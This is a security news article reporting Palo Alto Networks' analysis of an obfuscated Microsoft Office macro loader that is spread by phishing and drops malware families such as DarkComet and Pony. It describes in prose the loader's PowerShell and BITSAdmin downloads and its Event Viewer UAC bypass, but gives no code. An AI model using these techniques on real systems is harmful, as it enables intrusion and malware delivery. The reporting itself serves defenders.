Security researchers at Palo Alto Networks have recently discovered a Microsoft Office loader that drops multiple malware families, using malicious macros. The loader was first detected in early December 2016 and, since then, researchers stumbled across more than 650 using samples, accounting for 12,000 attacks against several industries.
The loader is being distributed via email and uses highly obfuscated malicious macros as well as a user account control (UAC) bypass technique. These 12,000 phishing emails come with different subjects like quotation requests, purchase orders, email verification notifications, purchase inquiries, etc. The documents attached to the emails are also posing as legitimate ones, claiming to be deposit slips, document scans, invoices, and product lists, among others.
Palo Alto Networks state that some of the most affected industries are Government, High-Tech and Professional and Legal Services. Of course, there are other sectors that have been targeted by this loader such as Telecoms, Services and Wholesale.
Ancalog, Bartalex, DarkComet, KeyBase, Pony, LuminosityLink, and PredatorPain are some of the malware families, dropped by this MS Office loader.
“Based on the large amount of commodity malware families being dropped, as well as the wide distribution seen, this loader appears to primarily be used for widespread campaigns.” – the security researchers say.
According to the experts, a builder was used to generate the malicious macros, which the loader is using, because of the fact that they are highly obfuscated with randomly chosen variables and a large amount of garbage code.
The researchers also add that the second part of the malicious macros consists of not only garbage code but also obfuscates strings and a number of strings, written to the Word document. These strings are in-line with the ploy used by the attacker, based on the subject line and the filename.
Moreover, the first half of the macro has a function to decode the obfuscated strings, after which they are called with a PowerShell command. In order for the strings to be decoded, the macro only removes characters present within a blacklist string. But researchers say that only 50% of the samples contained decoy information.
One of the decoded functions was supposed to use PowerShell to download a payload, which is then dropped in the %TEMP% directory. Next, the macro would create a registry key to point to said file, while at the same time it trying to bypass UAC, abusing Windows Event Viewer. After that, the dropped file is deleted.
The user account control (UAC) bypass technique was first detected in August, last year. Since then, however, it has been often used in different malicious campaigns, some of which distributed ransomware.
At first, instead of PowerShell, for 11 of the samples, the attackers relied on the built-in BITSAdmin tool to download the malware.
“Overall, this new loader is interesting in its use of performing a UAC bypass. Additionally, the widespread use of this loader since December of last year shows that it is being used in numerous campaigns. It is unclear if this loader is being used by one or more groups. Multiple industries have been targeted by this loader, which has been used to deploy multiple malware families.” – Palo Alto researchers conclude.